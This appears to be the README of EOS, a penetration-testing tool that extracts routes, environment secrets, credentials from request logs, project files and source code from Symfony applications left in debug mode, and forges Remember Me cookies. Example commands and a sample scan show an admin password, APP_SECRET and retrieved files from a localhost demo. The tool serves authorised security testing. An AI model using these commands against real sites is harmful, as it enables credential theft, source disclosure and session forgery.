Enemies Of Symfony (EOS)
EOS loots information from a Symfony target in debug mode:
| Section | Description |
|---|---|
| General | Get general information about the target. |
| Phpinfo | Extract Symfony environment variables from the exposed phpinfo(). |
| Routes | Get the list of registered routes. |
| Request logs | Look for credentials in POST request logs. |
| Project files | Retrieve project files (configuration, database, etc.) based on a wordlist. |
| Sources | Extract the application source code. |
| Cookies | Craft Remember Me cookies. |
More info at https://www.synacktiv.com/posts/pentest/looting-symfony-with-eos.html.
Note that this tool does not exploit any Symfony vulnerability. The profiler is
a useful component for developers and EOS simply takes advantage on
misconfigured Symfony applications. In fact, the profiler documentation
prominently warns developers:
Never enable the profiler in production environments as it will lead to major security vulnerabilities in your project.
Thanks to all the Symfony team for their awesome work!
Installation
Tested on Python >= 3.7.
$ git clone https://github.com/Synacktiv/eos
$ python3 -m pip install --user ./eosUsage
usage: eos [-h] [-V] [-v] [--no-colors] {scan,sources,get,creds,cookies} ...
███████╗ ██████╗ ███████╗
██╔════╝██╔═══██╗██╔════╝
█████╗ ██║ ██║███████╗
██╔══╝ ██║ ██║╚════██║
███████╗╚██████╔╝███████║ Enemies Of Symfony
╚══════╝ ╚═════╝ ╚══════╝ v1.1
positional arguments:
{scan,sources,get,creds,cookies}
scan perform a full scan
sources download application source code
get download a file from the application
creds extract credentials from request logs
cookies craft remember me cookies with a great lifetime
optional arguments:
-h, --help show this help message and exit
-V, --version display version info
-v, --verbose increase verbosity
--no-colors disable colors in output
examples:
eos scan http://localhost
eos scan -H 'Cookie: foo=bar; john=doe' -H 'User-Agent: EOS' http://localhost
eos get http://localhost config/services.yaml
eos cookies -u jane_admin -H '$2y$13$IMalnQpo7xfZD5FJGbEadOcqyj2mi/NQbQiI8v2wBXfjZ4nwshJlG' -s 67d829bf61dc5f87a73fd814e2c9f629$ eos scan http://localhost --output results
[+] Starting scan on http://localhost
[+] 2020-04-23 14:21:26.463352 is a great day
[+] Info
[!] Symfony 5.0.1
[!] PHP 7.3.11-1~deb10u1
[!] Environment: dev
[+] Request logs
[+] Found 9 POST requests
[!] Found the following credentials with a valid session:
[!] jane_admin: kitten [ROLE_ADMIN]
[+] Phpinfo
[+] Available at http://localhost/_profiler/phpinfo
[+] Found 101 PHP variables
[!] Found the following Symfony variables:
[!] APP_ENV: dev
[!] APP_SECRET: 67d829bf61dc5f87a73fd814e2c9f629
[!] DATABASE_URL: sqlite:///%kernel.project_dir%/data/database.sqlite
[!] MAILER_URL: null://localhost
[+] Project files
[+] Found: composer.lock, run 'symfony security:check' or submit it at https://security.symfony.com
[!] Found the following files:
[!] composer.lock
[!] composer.json
[!] config/bundles.php
[!] config/bootstrap.php
[!] config/packages/assets.yaml
[!] config/packages/cache.yaml
[!] config/packages/dev/debug.yaml
[!] config/packages/dev/monolog.yaml
[!] config/packages/dev/routing.yaml
[!] config/packages/dev/swiftmailer.yaml
[!] config/packages/dev/web_profiler.yaml
[!] config/packages/doctrine_migrations.yaml
[!] config/packages/doctrine.yaml
[!] config/packages/framework.yaml
[!] config/packages/html_sanitizer.yaml
[!] config/packages/prod/doctrine.yaml
[!] config/packages/prod/monolog.yaml
[!] config/packages/prod/routing.yaml
[!] config/packages/prod/webpack_encore.yaml
[!] config/packages/routing.yaml
[!] config/packages/security.yaml
[!] config/packages/sensio_framework_extra.yaml
[!] config/packages/swiftmailer.yaml
[!] config/packages/test/dama_doctrine_test_bundle.yaml
[!] config/packages/test/framework.yaml
[!] config/packages/test/monolog.yaml
[!] config/packages/test/routing.yaml
[!] config/packages/test/security.yaml
[!] config/packages/test/swiftmailer.yaml
[!] config/packages/test/twig.yaml
[!] config/packages/test/validator.yaml
[!] config/packages/test/webpack_encore.yaml
[!] config/packages/test/web_profiler.yaml
[!] config/packages/translation.yaml
[!] config/packages/twig.yaml
[!] config/packages/validator.yaml
[!] config/packages/webpack_encore.yaml
[!] config/routes/annotations.yaml
[!] config/routes/dev/framework.yaml
[!] config/routes/dev/web_profiler.yaml
[!] config/routes.yaml
[!] config/services.yaml
[!] data/database.sqlite
[!] data/database_test.sqlite
[!] package.json
[!] public/index.php
[!] public/robots.txt
[!] README.md
[!] src/Kernel.php
[!] symfony.lock
[!] var/cache/dev/url_generating_routes.php
[!] var/cache/dev/url_matching_routes.php
[!] var/log/dev.log
[+] Routes
[!] Found the following routes:
[!] /{_locale}/admin/post/
[!] /{_locale}/admin/post/
[!] /{_locale}/admin/post/new
[!] /{_locale}/admin/post/{id}
[!] /{_locale}/admin/post/{id}/edit
[!] /{_locale}/admin/post/{id}/delete
[!] /{_locale}/blog/
[!] /{_locale}/blog/rss.xml
[!] /{_locale}/blog/page/{page}
[!] /{_locale}/blog/posts/{slug}
[!] /{_locale}/blog/comment/{postSlug}/new
[!] /{_locale}/blog/search
[!] /{_locale}/login
[!] /{_locale}/logout
[!] /{_locale}/profile/edit
[!] /{_locale}/profile/change-password
[!] /{_locale}
[+] Project sources
[!] Found the following source files:
[!] src/Command/AddUserCommand.php
[!] src/Command/DeleteUserCommand.php
[!] src/Command/ListUsersCommand.php
[!] src/Controller/Admin/BlogController.php
[!] src/Controller/BlogController.php
[!] src/Controller/SecurityController.php
[!] src/Controller/UserController.php
[!] src/DataFixtures/AppFixtures.php
[!] src/Entity/Comment.php
[!] src/Entity/Post.php
[!] src/Entity/Tag.php
[!] src/Entity/User.php
[!] src/EventSubscriber/CheckRequirementsSubscriber.php
[!] src/EventSubscriber/CommentNotificationSubscriber.php
[!] src/EventSubscriber/ControllerSubscriber.php
[!] src/EventSubscriber/RedirectToPreferredLocaleSubscriber.php
[!] src/Events/CommentCreatedEvent.php
[!] src/Form/CommentType.php
[!] src/Form/DataTransformer/TagArrayToStringTransformer.php
[!] src/Form/PostType.php
[!] src/Form/Type/ChangePasswordType.php
[!] src/Form/Type/DateTimePickerType.php
[!] src/Form/Type/TagsInputType.php
[!] src/Form/UserType.php
[!] src/Kernel.php
[!] src/Pagination/Paginator.php
[!] src/Repository/PostRepository.php
[!] src/Repository/TagRepository.php
[!] src/Repository/UserRepository.php
[!] src/Security/PostVoter.php
[!] src/Twig/AppExtension.php
[!] src/Twig/SourceCodeExtension.php
[!] src/Utils/Markdown.php
[!] src/Utils/MomentFormatConverter.php
[!] src/Utils/Slugger.php
[!] src/Utils/Validator.php
[+] Saving files to results
[+] Saved 88 files
[+] Generated tokens: 5894a5 f68efa
[+] Scan completed in 0:00:13